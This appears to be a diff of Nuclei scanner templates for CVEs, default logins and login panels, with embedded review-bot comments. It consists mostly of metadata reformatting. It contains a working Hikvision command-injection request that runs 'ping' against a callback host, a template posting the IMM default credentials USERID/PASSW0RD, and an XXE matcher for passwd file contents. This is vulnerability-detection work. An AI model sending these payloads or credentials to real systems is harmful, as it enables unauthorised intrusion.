shodan-query: http.favicon.hash:217119619
fofa-query: app="RStudio-Connect"
tags: tenable,cve,cve2022,redirect,rstudio
http:
@ -46,4 +47,4 @@ http:
- type: status
status:
- 307
# digest: 4a0a00473045022100e9632f43574d44779bc09a10a78cb6835cc4b0179a707b395efecda59dcb8b5402205a72129b99d873d786c6aa9062e142a0b02192b31aa930c1a234a6d61558b479:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100aed598584561fa1188599f4a3fa2ff5ae9149e94b624fef3be306a7a74429c3f02201c02b4ebc6bfa15076a56527dc53df6e0be1e5d7f890dbc1558b26e30d35059b:922c64590222798bb761d5b6d8e72950


@ -18,8 +18,8 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-4140
cwe-id: CWE-552
epss-score: 0.01317
epss-percentile: 0.84504
epss-score: 0.00932
epss-percentile: 0.82572
cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
@ -54,4 +54,4 @@ http:
- type: status
status:
- 200
# digest: 4b0a00483046022100c309f56d1bc6b8b3ad4aeedfea6624e9072d042193f145856563965410ce9e7c022100cc3f6acff92ea09cb461e67964a2e5973fbb82fdd391e5176e287a0be8c759c1:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402200691e9b2e104e67432ef4041648aca88eaa5a1fc58bbc764da8a0cf8240733da022015c0a0d07bcd6552d8c77f685c7c9bc595e3e7e9f3d8bf9b201968fcd4af75b4:922c64590222798bb761d5b6d8e72950


@ -17,7 +17,7 @@ info:
cve-id: CVE-2023-0552
cwe-id: CWE-601
epss-score: 0.00086
epss-percentile: 0.35637
epss-percentile: 0.34914
cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
@ -38,4 +38,4 @@ http:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$'
# digest: 4a0a004730450221008eccfd0ecd7398b3566c5cfec47a5d3396899495831dabbee13a144918b2127e0220232a7e35aba58e28f2c38ac75f7f4558d7419e63c82e7b145dba6569f3e52fcf:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402201ab8dcd9693d8e9c7b7e3c2ac162de7610f21d7c3523e623a005ecdeababa57902203039fe388db8f4aef6c49c40a2cff545792484a6dda13261675b612810c874f9:922c64590222798bb761d5b6d8e72950


@ -22,7 +22,7 @@ info:
cve-id: CVE-2023-26255
cwe-id: CWE-22
epss-score: 0.15138
epss-percentile: 0.95348
epss-percentile: 0.95663
cpe: cpe:2.3:a:stagil:stagil_navigation:*:*:*:*:*:jira:*:*
metadata:
max-request: 1
@ -52,4 +52,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a0047304502203d3f6c5452e186ee057389d3819be8e0fb41db7582a366b90ee39072f3c7d77f022100a9a161043ec3d29f43d105a2fd562bb509c5f7b85392ff6516cb29dde828f5b9:922c64590222798bb761d5b6d8e72950
# digest: 4a0a004730450221009eff1cfcd9afb5c04d7b263baaf2ff4faf43631d4e6eaf033ca3c6b8fd85de5d022060065320c9d8eac58e06f71ddabfeaecb433875fa230c89a4015e129415c44f3:922c64590222798bb761d5b6d8e72950


@ -6,28 +6,29 @@ info:
severity: critical
description: |
The Gift Cards (Gift Vouchers and Packages) WordPress Plugin, version <= 4.3.1, is affected by an unauthenticated SQL injection vulnerability in the template parameter in the wpgv_doajax_voucher_pdf_save_func action.
impact: |
Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
remediation: |
Update the Gift Cards (Gift Vouchers and Packages) WordPress Plugin to the latest version available.
reference:
- https://www.tenable.com/security/research/tra-2023-2
- https://wordpress.org/plugins/gift-voucher/
- https://github.com/ARPSyndicate/cvemon
- https://github.com/JoshuaMart/JoshuaMart
impact: |
Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
remediation: |
Update the Gift Cards (Gift Vouchers and Packages) WordPress Plugin to the latest version available.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-28662
cwe-id: CWE-89
cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:*
epss-score: 0.00076
epss-percentile: 0.31593
cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:*
metadata:
vendor: codemenschen
product: gift_vouchers
product: "gift_vouchers"
framework: wordpress
fofa-query: body="/wp-content/plugins/gift-voucher/"
fofa-query: "body=\"/wp-content/plugins/gift-voucher/\""
max-request: 2
tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,unauth,gift-voucher
flow: http(1) && http(2)
@ -59,4 +60,4 @@ http:
- status_code == 500
- contains(body, 'critical error')
condition: and
# digest: 490a00463044022009c58d25fec3c30e1ad3887484383645315f8e71fe821a509bf323cff77eb615022072f0bfae8790782eb15f69313e0ba60c76e9b1431b1bd18cf6842ca56ad685a9:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100897f4b8dcfa22ad10a9b4881331ba0166610d2d1f177506cf60e47094c3bfbea022100b256673611bdf13504dc6bf1875ba960441fb7f9bb60ec748474e98d2c76d3fc:922c64590222798bb761d5b6d8e72950


@ -13,13 +13,14 @@ info:
- https://twitter.com/wvuuuuuuuuuuuuu/status/1694956245742923939
- https://forums.ivanti.com/s/article/Avalanche-Vulnerabilities-Addressed-in-6-4-1?language=en_US
- https://nvd.nist.gov/vuln/detail/CVE-2023-32563
- https://github.com/mayur-esh/vuln-liners
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-32563
cwe-id: CWE-22
epss-score: 0.43261
epss-percentile: 0.97013
epss-score: 0.42647
epss-percentile: 0.97218
cpe: cpe:2.3:a:ivanti:avalanche:*:*:*:*:*:*:*:*
metadata:
max-request: 2
@ -56,4 +57,4 @@ http:
part: body_2
words:
- "CVE-2023-32563"
# digest: 4b0a0048304602210095f0377361174bf0f18bb6b480904a01bad012dd184abcf963d328e084a7cf45022100aa4c0a0aad45a19e6fb8fd3dc956cc89ac088f8ed744c630eb9b9cd5d1ad38ee:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220277c51026fc6ee497604b9edf835b895ebb5f041702564b51386e1aff926cdd502206a64318799d865c7590bca991daf364669b8257fa8d74439d3aada9f801eb608:922c64590222798bb761d5b6d8e72950


@ -6,14 +6,14 @@ info:
severity: high
description: |
users can execute code without authentication. An attacker can execute malicious requests on the OpenCms server. When the requests are successful vulnerable OpenCms can be exploited resulting in an unauthenticated XXE vulnerability. Based on research OpenCMS versions from 9.0.0 to 10.5.0 are vulnerable.
remediation: Advised to upgrade to OpenCMS 10.5.1 or later to patch the vulnerability
reference:
- https://blog.qualys.com/product-tech/2023/12/08/opencms-unauthenticated-xxe-vulnerability-cve-2023-42344
- https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/
remediation: Advised to upgrade to OpenCMS 10.5.1 or later to patch the vulnerability
metadata:
verified: true
max-request: 1
max-request: 2
fofa-query: "OpenCms-9.5.3"
verified: true
tags: cve,cve2023,xxe,opencms
http:
@ -36,4 +36,4 @@ http:
- "root:.*:0:0:"
- "invalidArgument"
condition: and
# digest: 4a0a00473045022100927a1bd7a3c4f8af7b6989155be518f1259a6cdd15ba59dad7785280d7c5ec9702203e99452c03ab5e09e1ef1627473fb5a1ebe79a654ad369b1e2190145c98e9b32:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502207dccf8dee9a6e05f16f56533d13329cf5bb1cac34d72692fef62fd33077527e20221009e14b0264ffda37db9a79c357a04a6512985d7c64cc6157addf5246d2ec24d1e:922c64590222798bb761d5b6d8e72950


@ -16,8 +16,9 @@ info:
cpe: cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:*
metadata:
vendor: ivanti
product: connect_secure
shodan-query: html:"welcome.cgi?p=logo"
product: "connect_secure"
shodan-query: "html:\"welcome.cgi?p=logo\""
max-request: 2
tags: cve,cve2023,kev,auth-bypass,ivanti
http:
@ -48,4 +49,4 @@ http:
- 'contains(body_2, "block_message")'
- 'contains(header_2, "application/json")'
condition: and
# digest: 490a0046304402204614c79e65441e3043a41452c64e73db844daaec0a04ff4ec5d9999c51825f83022077d76a1a7ab3b0ab8fb364824bfe94bcf6ad07ef3fc21736ac56399d12397a58:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402204ad3fa1c2d287f2d56aad453123f1b51f179ee3f12ab4a01a78e376c8d3de46b022044b7912e398ea01a9fb5d948d162710fb8ece66b2fc48b8a9c82b38568a12c03:922c64590222798bb761d5b6d8e72950


@ -14,14 +14,15 @@ info:
cvss-score: 5.4
cve-id: CVE-2023-52085
cwe-id: CWE-22
cpe: cpe:2.3:a:wintercms:winter:*:*:*:*:*:*:*:*
epss-score: 0.00046
epss-percentile: 0.12483
cpe: cpe:2.3:a:wintercms:winter:*:*:*:*:*:*:*:*
metadata:
vendor: wintercms
product: winter
shodan-query: title:"Winter CMS"
fofa-query: title="Winter CMS"
shodan-query: "title:\"Winter CMS\""
fofa-query: "title=\"Winter CMS\""
max-request: 4
tags: cve,cve2023,authenticated,lfi,wintercms
http:
@ -68,4 +69,4 @@ http:
regex:
- '<input name="_token" type="hidden" value="([0-9a-zA-Z]{40})">'
internal: true
# digest: 490a0046304402205dc4e3489b8db4f6e587d569813f9eec4372432d2ed1350de8d8bc00c7d01a8d02207363f5db9a634f3a0973e7e364948a39da565ec0b5ea0f3ac1276c0fc7027331:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100edda67cd80bdd516aa4f6241fa72a9e1d6c1e240eb1d40d35ae9c44143ff025902206f496f8d850ad284d589527d8abd90bf13aa0414c007dad56d79ba9c57d33c59:922c64590222798bb761d5b6d8e72950


@ -6,25 +6,26 @@ info:
severity: high
description: |
Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.
remediation: |
Upgrade Mlflow to version 2.9.2 or later to mitigate the vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-6831
- https://github.com/mlflow/mlflow/commit/1da75dfcecd4d169e34809ade55748384e8af6c1
- https://huntr.com/bounties/0acdd745-0167-4912-9d5c-02035fe5b314
remediation: |
Upgrade Mlflow to version 2.9.2 or later to mitigate the vulnerability.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2023-6831
cwe-id: CWE-22
epss-score: 0.000460000
epss-percentile: 0.126930000
cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
epss-score: 0.00046
epss-percentile: 0.12693
metadata:
verified: true
vendor: lfprojects
product: mlflow
shodan-query: http.title:"mlflow"
shodan-query: "http.title:\"mlflow\""
max-request: 2
verified: true
tags: cve,cve2023,mlflow,pathtraversal,lfprojects
http:
@ -58,4 +59,4 @@ http:
- type: status
status:
- 500
# digest: 490a0046304402202e05b1ca433f0cc3ad8178fa3db634d613c180a5d76bd1907daf5a29b102f02f0220546c974febbb5121e3697cfc1e76620c450e31cee055c94cd0b25375648e38ba:922c64590222798bb761d5b6d8e72950
# digest: 490a00463044022032f829866528954cdb8ce1c5298787430b08b1d4550ab556b77f078e362da3e102207691a8b5b4639a9faf128176e590b98fc0841775bb6df00b97a7253772fe498a:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,56 @@
id: CVE-2023-6895
info:
name: Hikvision Intercom Broadcasting System - Command Execution
author: archer
severity: critical
description: |
Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE (HIK) version has an operating system command injection vulnerability. The vulnerability originates from the parameter jsondata[ip] in the file /php/ping.php, which can cause operating system command injection.
reference:
- https://github.com/FuBoLuSec/CVE-2023-6895/blob/main/CVE-2023-6895.py
- https://vuldb.com/?ctiid.248254
- https://vuldb.com/?id.248254
- https://github.com/Marco-zcl/POC
- https://github.com/d4n-sec/d4n-sec.github.io
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-6895
cwe-id: CWE-78
epss-score: 0.0008
epss-percentile: 0.32716
cpe: cpe:2.3:o:hikvision:intercom_broadcast_system:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: hikvision
product: intercom_broadcast_system
fofa-query: icon_hash="-1830859634"
tags: cve,cve2023,rce,hikvision
http:
- raw:
- |
POST /php/ping.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ping%20{{interactsh-url}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: body
words:
- "TTL="
- type: status
status:
- 200
# digest: 490a00463044022046e9673fbb222a36f6113e7f32e176bc2d800d2a0f8fb0824bc84dd30705c4fa022051992f8ba2020e9c09b574c69ecbca8b48a5d98fda9f790dd46ba0313ebb08bb:922c64590222798bb761d5b6d8e72950
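Review bot: The body matcher requires the exact upper-case string `TTL=`, so ping output that prints `ttl=` in lower case would fail the `matchers-condition: and` even when the DNS interaction was recorded, and an affected host could be reported as clean. Adding `case-insensitive: true` to that word matcher keeps the check while accepting both spellings. A comment explaining why all three matchers are required would also help. Presumably the DNS callback is the real evidence and the body and status checks only reduce noise, but an endpoint whose purpose is to ping a supplied host may resolve the name without any injection taking place, so the result should be confirmed against a patched build.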


@ -6,24 +6,25 @@ info:
severity: critical
description: |
Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.
impact: |
Successful exploitation could be lead to disclose of sensitive information such as SSH Keys or Internal configurations.
remediation: |
To fix this vulnerability, it is important to update the mlflow package to the latest version 2.10.0.
reference:
- https://huntr.com/bounties/11209efb-0f84-482f-add0-587ea6b7e850/
- https://nvd.nist.gov/vuln/detail/CVE-2023-6909
- https://github.com/mlflow/mlflow/commit/1da75dfcecd4d169e34809ade55748384e8af6c1
impact: |
Successful exploitation could be lead to disclose of sensitive information such as SSH Keys or Internal configurations.
remediation: |
To fix this vulnerability, it is important to update the mlflow package to the latest version 2.10.0.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
cvss-score: 9.3
cve-id: CVE-2023-6909
cwe-id: CWE-29
metadata:
max-request: 5
verified: true
vendor: lfprojects
product: mlflow
shodan-query: http.title:"mlflow"
shodan-query: "http.title:\"mlflow\""
tags: cve,cve2023,mlflow,lfi
http:
@ -90,4 +91,4 @@ http:
json:
- '.run.info.run_id'
internal: true
# digest: 4a0a00473045022057cab29fe3d00006c6db44ac420a34cecdad60ef71ae6159d9d1870d61d97420022100cd6d7114a977b54c1190e1a9a7002626d05b41874dccf1e9e5d38cacc7082c6d:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100dc4c33652fcf1a1d0dc29690ac81838de82d0c439cc405cb3b0296d4e10cb855022100b3a49f754395ee217ea12cc561be556cc6c3a8da3facee851d5f37fdbab72d61:922c64590222798bb761d5b6d8e72950


@ -15,14 +15,15 @@ info:
cvss-score: 8.8
cve-id: CVE-2024-0713
cwe-id: CWE-434
cpe: cpe:2.3:a:monitorr:monitorr:1.7.6m:*:*:*:*:*:*:*
epss-score: 0.00061
epss-percentile: 0.2356
cpe: cpe:2.3:a:monitorr:monitorr:1.7.6m:*:*:*:*:*:*:*
metadata:
vendor: monitorr
product: monitorr
verified: true
fofa-query: icon_hash="-211006074"
fofa-query: "icon_hash=\"-211006074\""
max-request: 2
tags: cve,cve2024,file-upload,intrusive,monitorr
variables:
@ -66,4 +67,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a0047304502200e99cf7ecbba3a0c88653fc454cb5715d7085e0678ab470e4b7cfbf4dd198e8d022100e47a621b93eaabb8881e48cae80b9cc8c0596a437fc9b8ac0921a63beee74506:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402201b9bb4536c3d56e915516c2b0156629ce6f3689a312eddd8d0694b86aa144e1902203d8dccbcbba044b30e6fff72ceb7f66bf40a9bf6f3130c3f3b11b0ec3c30a863:922c64590222798bb761d5b6d8e72950


@ -6,17 +6,17 @@ info:
severity: medium
description: |
There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.
reference:
- https://github.com/getrebuild/rebuild
- https://nvd.nist.gov/vuln/detail/CVE-2024-1021
impact: |
Successful exploitation of this vulnerability can result in unauthorized access to sensitive internal resources.
remediation: |
Apply the latest security patches or updates provided by Rebuild to fix this vulnerability.
reference:
- https://github.com/getrebuild/rebuild
- https://nvd.nist.gov/vuln/detail/CVE-2024-1021
metadata:
max-request: 1
max-request: 2
verified: true
fofa-query: icon_hash="871154672"
fofa-query: "icon_hash=\"871154672\""
tags: cve2024,cve,rebuild,ssrf
http:
@ -32,4 +32,4 @@ http:
- '!contains(body_1, "<h1> Interactsh Server </h1>")'
- 'status_code_2 == 200'
condition: and
# digest: 4a0a004730450220098225bea96b8668687e7dfe13e7567202130b05bf6e23cffcc70cb83386d700022100f078d24ac95ac54515557e84e1bc60404c9d6d59cfa0604f82e5d03baaf841e6:922c64590222798bb761d5b6d8e72950
# digest: 4a0a004730450220491492872c6924a820f6183de45c341dbc8838eec5bd79f241a7a8e007817a4d022100bcf486a787a7ac18c43f5a856e8edf8c68546b59012e7c096bbc48085b3ce175:922c64590222798bb761d5b6d8e72950


@ -6,14 +6,14 @@ info:
severity: high
description: |
WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.
impact: |
Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
remediation: |
Vendor did not acknowledge vulnerability but the issue seems to have been fixed in version 2.5.25.
reference:
- https://www.tenable.com/security/research/tra-2024-02
- https://wordpress.org/plugins/html5-video-player
- https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2024-1061
impact: |
Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
remediation: |
Vendor did not acknowledge vulnerability but the issue seems to have been fixed in version 2.5.25.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
@ -21,7 +21,8 @@ info:
cwe-id: CWE-89
metadata:
verified: true
fofa-query: '"wordpress" && body="html5-video-player"'
fofa-query: "\"wordpress\" && body=\"html5-video-player\""
max-request: 1
tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player
http:
@ -36,4 +37,4 @@ http:
- 'contains(header, "application/json")'
- 'contains_all(body, "created_at", "video_id")'
condition: and
# digest: 4b0a0048304602210082f5c18e0ac8422e532f5581f775dfd9a57d7c059cf6f41622d7a00306bfa3c6022100d0500ab738261efc3de306be7f8149c4a2f98b4c1560c26fe3617520ce9dd6e9:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100fa33c5d3e6fdd93832d18b7feaeceaab7dc13294ca6117b62c0cf322a734e7d3022100bec7347a690ebaf2785ae5b325485392dbdb16005fd15b862aca9a8930646034:922c64590222798bb761d5b6d8e72950


@ -6,25 +6,26 @@ info:
severity: medium
description: |
A log injection vulnerability was identified in pyload. This vulnerability allows any unauthenticated actor to inject arbitrary messages into the logs gathered by pyload.
impact: |
Forged or otherwise, corrupted log files can be used to cover an attacker's tracks or even to implicate another party in the commission of a malicious act.
reference:
- https://github.com/advisories/GHSA-ghmw-rwh8-6qmr
- https://nvd.nist.gov/vuln/detail/CVE-2024-21645
- https://github.com/fkie-cad/nvd-json-data-feeds
impact: |
Forged or otherwise, corrupted log files can be used to cover an attacker's tracks or even to implicate another party in the commission of a malicious act.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
cvss-score: 5.3
cve-id: CVE-2024-21645
cwe-id: CWE-74
cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*
epss-score: 0.00046
epss-percentile: 0.13723
cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*
metadata:
verified: true
vendor: pyload
product: pyload
shodan-query: title:"pyload"
shodan-query: "title:\"pyload\""
max-request: 2
tags: cve,cve2024,pyload,authenticated,injection
variables:
@ -59,4 +60,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a00473045022100e4681bad6b75b2295f0256953d1d293a42d79e61b3607a307caf6cc5b040ccbb02201912657be888fe3a799ada24aaa1de05d3667731e84900bedb0e556a187f2dfc:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402203cbf3ae7a02a2a68165345f0bd855eb6ab923669c8d2aa78f2922e0baee747f702201104ac76e942d9f3bff9d59b6e4227e4d59ff27e41aeca67e1138508b572d5b9:922c64590222798bb761d5b6d8e72950


@ -18,8 +18,9 @@ info:
cpe: cpe:2.3:a:ivanti:connect_secure:9.0:-:*:*:*:*:*:*
metadata:
vendor: ivanti
product: connect_secure
product: "connect_secure"
shodan-query: "html:\"welcome.cgi?p=logo\""
max-request: 1
tags: cve,cve2024,kev,ssrf,ivanti
http:
@ -43,4 +44,4 @@ http:
- '/dana-na/'
- 'WriteCSS'
condition: and
# digest: 4a0a00473045022100fefc6637185b28b4af8b503bdb7b89401fc591c34cb6082b20322ac0f1ad67c8022027e634cbc733ad699766de6d8eb8f22b6368d0b663cd28cbd957eaaf37f51838:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022031bba2e0349c9af3102196e00e85678ddbb51ba287e5d624558a50a3bbaa6be20221008a362ec4ef64ece7ab22636b902c72df49e1f72c519731e5c2eb22dec2db5c76:922c64590222798bb761d5b6d8e72950


@ -8,7 +8,8 @@ info:
- https://www.ibm.com/docs/en/odm/8.0.1?topic=users-tutorial-getting-started-decision-center-business-console
metadata:
verified: true
shodan-query: title="Decision Center | Business Console"
shodan-query: "title=\"Decision Center | Business Console\""
max-request: 1
tags: ibm,default-login,decision-center
http:
@ -42,4 +43,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a0047304502205523a863445a05acb27e5d7ae6cb824465b467afcd5bf3f7f916c78ff4853b54022100f6e82a4f9f222831b97dcb7bf5d0a3410048123eface5f0840f9571b5c31ac2d:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022016a80ca652cc1c45b3f6d4c92fce061f9fc9d9cb8d9cfe96626d34be23038086022100bc041f5982bff0cd5c6c76e96a375e3be9dcfdd433a205870a938cc378c23418:922c64590222798bb761d5b6d8e72950


@ -8,7 +8,8 @@ info:
- https://www.ibm.com/docs/en/odm/8.5.1?topic=console-tutorial-getting-started-decision-center-enterprise
metadata:
verified: true
shodan-query: html="Decision Center Enterprise console"
shodan-query: "html=\"Decision Center Enterprise console\""
max-request: 1
tags: ibm,default-login,decision-center
http:
@ -42,4 +43,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a00473045022100f49bccdf778836b24be61c1c569daa47361ed0b8f9f3b1832055b5bc2a007f1502206ce043ef3f1813f97d2ff4376fadf94112238eed01bfb77c3d404179a8b760b4:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100eda449ebab75e6434f62e1e6ad214e7a3a4cbc01f47209e6f2367427fc73892f02202b8e060110bc0d3aed5fc0e773daa6416705f332e863b1f851a004b1364615be:922c64590222798bb761d5b6d8e72950


@ -8,7 +8,8 @@ info:
- https://www.ibm.com/docs/en/odm/8.8.0?topic=center-overview-decision
metadata:
verified: true
shodan-query: title:"Rule Execution Server"
shodan-query: "title:\"Rule Execution Server\""
max-request: 1
tags: ibm,default-login,decision-server
http:
@ -43,4 +44,4 @@ http:
- type: status
status:
- 200
# digest: 4b0a00483046022100e2da7214e13a57c4441de262e1f4377d8decac405644528c512f6298514f47ac022100f1ac476ef1244aed60da4511ef21547cb5d7cbd6238124f45f040fadc6796b39:922c64590222798bb761d5b6d8e72950
# digest: 4a0a004730450220196e8fb1a9ddef98855c38f2719f3c5405d7c51e90772f82c6d35c0d7596cc06022100cc5faf04711e248eb7c4c8b2fd597c8346977de7602568861691790ec7a56b1b:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,44 @@
id: imm-default-login
info:
name: Integrated Management Module - Default Login
author: jpg0mez
severity: high
description: |
Integrated Management Module default login credentials were discovered.
reference:
- https://pubs.lenovo.com/x3650-m4/t_logging_web_interface
- https://www.ibm.com/docs/en/tcs-service?topic=oip-logging-imm-web-interface
classification:
cwe-id: CWE-798
metadata:
verified: true
max-request: 1
fofa-query: "integrated management module"
shodan-query: html:"ibmdojo"
tags: imm,ibm,default-login
http:
- method: POST
path:
- "{{BaseURL}}/data/login"
body: "user=USERID&password=PASSW0RD"
redirects: true
matchers-condition: and
matchers:
- type: word
words:
- "<authResult>0</authResult>"
- 'authResult":"0'
condition: or
- type: word
words:
- "index-console.php"
- "home.php"
condition: and
- type: status
status:
- 200
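Review bot: This template reports a high-severity default-credential finding but has no `remediation` entry, so the result does not tell the owner what to change; add something like `remediation: Change the default USERID password and restrict the IMM web interface to a dedicated management network.` Both word matchers omit `part`, while the other templates in this commit state `part: body` explicitly; adding it makes the intent clear. `shodan-query: html:"ibmdojo"` is left unquoted although this commit rewrites most of the other `shodan-query` values to the double-quoted form. This is also the only added template on the page without a trailing `# digest:` line, which may simply mean it was not yet signed when merged.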


@ -7,8 +7,9 @@ info:
reference:
- https://documentation.softwareag.com/
metadata:
shodan-query: "http.favicon.hash:-234335289"
max-request: 5
verified: true
shodan-query: http.favicon.hash:-234335289
tags: default-login,webmethod
flow: http(1) && http(2)
@ -63,4 +64,4 @@ http:
- Invalid credentials
negative: true
condition: and
# digest: 4a0a00473045022100c2ff9832495b567326f60a3290cab01226778deef5fb3b3cc77288024507dce7022035ca48f6387403fbaccecdec948c4473ce0e90f135fc8b17cc5c3c28c8d54d70:922c64590222798bb761d5b6d8e72950
# digest: 4a0a004730450220115d89c488b0862bb1273fe0b0298087afa5b74b011991ae1cebba5921795590022100a3bbc39dba847eadccd27ed89d597a41e3a4508393fae04c9c017f35f0b9db36:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,37 @@
id: cisco-unity-panel
info:
name: Cisco Unity Connection Panel - Detect
author: HeeresS
severity: info
description: |
A Cisco Unity Connection instance was detected.
metadata:
shodan-query: "html:\"Cisco Unity Connection\""
max-request: 2
verified: true
tags: panel,cisco,unity,login,detect
http:
- method: GET
path:
- "{{BaseURL}}/cuadmin/home.do"
- "{{BaseURL}}"
stop-at-first-match: true
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Cisco Unity Connection Administration"
- ">Cisco Unity Connection</a>"
condition: or
- type: status
status:
- 200
# digest: 490a00463044022022e561912a02fb0baa91f246eebc3a05855972f2bab1224383889c1dfc20e20b02201a6bfd866f1ed3a945fb0c8a615a7b41244c13f0286921c37b72d89b08e95e70:922c64590222798bb761d5b6d8e72950


@ -11,10 +11,9 @@ info:
- https://dockge.kuma.pet/
metadata:
verified: true
max-request: 2
shodan-query: title:"Dockge"
max-request: 1
shodan-query: "title:\"Dockge\""
tags: panel,dockge,login
http:
- method: GET
path:
@ -32,4 +31,4 @@ http:
- type: status
status:
- 200
# digest: 490a0046304402207b4b31e89b41d54ec47a046fbbfcff3b303e68aff67845ca51b890588d9c2f180220712c5d5677eb71010f6ec9f123f1f4a074bc531998dba39a0c8a287a7e5cf40d:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502204b3172c4c1a24716f7a36595e882653be64ea2699acebc7150c9bb87487c4b7302210091e20d9ea7ba962951c9bd8836bb065e490b7c99eda7f2b34b8209c155ebd94b:922c64590222798bb761d5b6d8e72950


@ -5,12 +5,13 @@ info:
author: righettod
severity: info
description: |
EasyJOB login panel was detected.
EasyJOB login panel was detected.
reference:
- https://www.en.because-software.com/software/easyjob/
metadata:
verified: true
shodan-query: http.title:"Log in - easyJOB"
shodan-query: "http.title:\"Log in - easyJOB\""
max-request: 1
tags: panel,easyjob,login
http:
@ -31,4 +32,4 @@ http:
group: 1
regex:
- 'easyJOB\s+([0-9.]+)'
# digest: 4a0a004730450220411982e48718601305b05a93c91be6a680ce993e5e110400b0dabbff753fe0bb02210091af5cbecc2fd766de347dad93c4a3e105a0d3f5a4a8f7a002bdb838c3bc2fad:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100f82e7fbb4c360cb536e24b99b8f65c91e8d46ebbc0f45a156d6074c154e202a402203334ffeaa0ca0e92f85d5ddcfd516f44ec9fbc55655b5351d2e193726e2b2248:922c64590222798bb761d5b6d8e72950


@ -7,12 +7,11 @@ info:
description: GoAnywhere Managed File Transfer login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0
cwe-id: CWE-200
metadata:
shodan-query: "http.html:\"GoAnywhere Managed File Transfer\""
verified: true
max-request: 1
shodan-query: http.html:"GoAnywhere Managed File Transfer"
max-request: 2
tags: panel,goanywhere,login,filetransfer
http:
@ -35,4 +34,4 @@ http:
- type: status
status:
- 200
